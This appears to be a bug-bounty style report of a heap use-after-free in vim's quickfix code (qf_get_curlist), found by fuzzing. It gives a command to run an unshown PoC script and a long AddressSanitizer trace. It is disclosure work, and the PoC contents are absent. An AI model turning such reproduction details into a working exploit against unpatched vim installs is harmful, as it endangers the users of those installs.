Use After Free in function qf_get_curlist in vim/vim

Valid

Reported on

Oct 19th 2022


Description

Use After Free in function qf_get_curlist at quickfix.c:1932 .

vim version

git log
commit bf72e0c67f26ea7c8fd941fdd1533c24c7b6cb43 (grafted, HEAD -> master, tag: v9.0.0792, origin/master, origin/HEAD)

Proof of Concept

./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/fuzz/test/poc14_huaf.dat -c :qa!
=================================================================
==147326==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00005be88 at pc 0x55f4ac3e895f bp 0x7ffe39fa57b0 sp 0x7ffe39fa57a0
READ of size 4 at 0x61b00005be88 thread T0
    #0 0x55f4ac3e895e in qf_get_curlist /home/fuzz/vim/src/quickfix.c:1932
    #1 0x55f4ac3f4422 in qf_win_pos_update /home/fuzz/vim/src/quickfix.c:4446
    #2 0x55f4ac3f4f99 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4609
    #3 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902
    #4 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #5 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #6 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912
    #7 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571
    #8 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #9 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #10 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #11 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #14 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #15 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #16 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #17 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #18 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #19 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #20 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #21 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #22 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #23 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #24 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #25 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #26 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #27 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #28 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #29 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #30 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #31 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #32 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #33 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #34 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #35 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #36 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #37 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #38 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #39 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #40 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #41 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #42 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #43 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #44 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #45 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #46 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #47 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #48 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #49 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #50 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #51 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #52 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #53 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #54 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #55 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #56 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #57 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #58 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #59 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #60 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #61 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #62 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #63 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #64 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #65 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #66 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #67 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #68 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #69 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #70 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #71 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #72 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #73 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #74 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #75 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #76 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #77 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #78 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #79 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #80 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #81 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #82 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #83 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #84 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #85 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #86 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #87 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #88 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #89 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #90 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #91 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #92 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #93 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #94 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #95 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #96 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #97 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #98 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #99 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #100 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #101 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #102 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #103 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #104 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #105 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #106 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #107 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #108 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #109 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #110 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #111 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #112 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #113 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #114 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #115 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #116 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #117 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #118 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #119 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #120 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #121 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #122 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #123 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #124 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #125 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #126 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #127 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #128 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #129 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #130 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #131 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #132 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #133 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #134 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #135 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #136 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #137 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #138 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #139 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #140 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #141 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #142 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #143 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #144 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #145 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #146 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #147 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #148 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #149 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #150 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #151 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #152 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #153 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #154 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #155 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #156 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #157 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #158 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #159 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #160 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #161 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #162 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #163 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #164 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #165 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #166 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #167 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #168 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #169 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #170 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #171 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #172 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #173 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #174 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #175 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #176 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #177 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #178 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #179 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #180 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #181 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #182 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #183 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #184 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #185 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #186 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #187 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #188 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #189 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #190 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #191 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #192 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #193 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #194 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #195 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #196 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #197 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #198 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #199 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #200 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #201 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #202 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #203 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #204 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #205 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #206 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #207 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #208 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #209 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #210 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #211 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #212 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #213 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #214 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #215 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #216 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #217 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #218 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #219 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #220 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #221 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #222 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #223 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #224 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #225 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #226 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #227 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #228 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #229 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #230 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #231 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #232 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #233 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #234 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #235 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #236 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #237 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #238 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #239 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #240 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #241 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #242 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #243 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #244 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #245 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #246 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #247 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #248 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #249 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #250 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146

0x61b00005be88 is located 8 bytes inside of 1464-byte region [0x61b00005be80,0x61b00005c438)
freed by thread T0 here:
    #0 0x7f862ee4340f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
    #1 0x55f4abfed596 in vim_free /home/fuzz/vim/src/alloc.c:615
    #2 0x55f4ac3e91ab in ll_free_all /home/fuzz/vim/src/quickfix.c:2049
    #3 0x55f4ac4023ee in qf_free_stack /home/fuzz/vim/src/quickfix.c:7714
    #4 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750
    #5 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560
    #6 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589
    #7 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049
    #8 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681
    #9 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841
    #10 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647
    #11 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971
    #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #14 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232
    #15 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710
    #16 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540
    #17 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538
    #18 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378
    #19 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423
    #20 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855
    #21 0x55f4ac3f4f31 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4604
    #22 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902
    #23 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #24 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #25 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912
    #26 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571
    #27 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #28 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #29 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146

previously allocated by thread T0 here:
    #0 0x7f862ee43808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x55f4abfed2aa in lalloc /home/fuzz/vim/src/alloc.c:246
    #2 0x55f4abfed140 in alloc_clear /home/fuzz/vim/src/alloc.c:177
    #3 0x55f4abfed1e1 in alloc_clear_id /home/fuzz/vim/src/alloc.c:193
    #4 0x55f4ac3e9cec in qf_alloc_stack /home/fuzz/vim/src/quickfix.c:2233
    #5 0x55f4ac40231d in qf_free_stack /home/fuzz/vim/src/quickfix.c:7707
    #6 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750
    #7 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560
    #8 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589
    #9 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049
    #10 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681
    #11 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841
    #12 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647
    #13 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971
    #14 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #15 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #16 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232
    #17 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710
    #18 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540
    #19 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538
    #20 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378
    #21 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423
    #22 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855
    #23 0x55f4ac3f3eea in ex_copen /home/fuzz/vim/src/quickfix.c:4372
    #24 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #25 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #26 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #27 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #28 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #29 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578

SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzz/vim/src/quickfix.c:1932 in qf_get_curlist
Shadow bytes around the buggy address:
  0x0c3680003780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680003790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c36800037a0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c36800037b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c36800037c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c36800037d0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
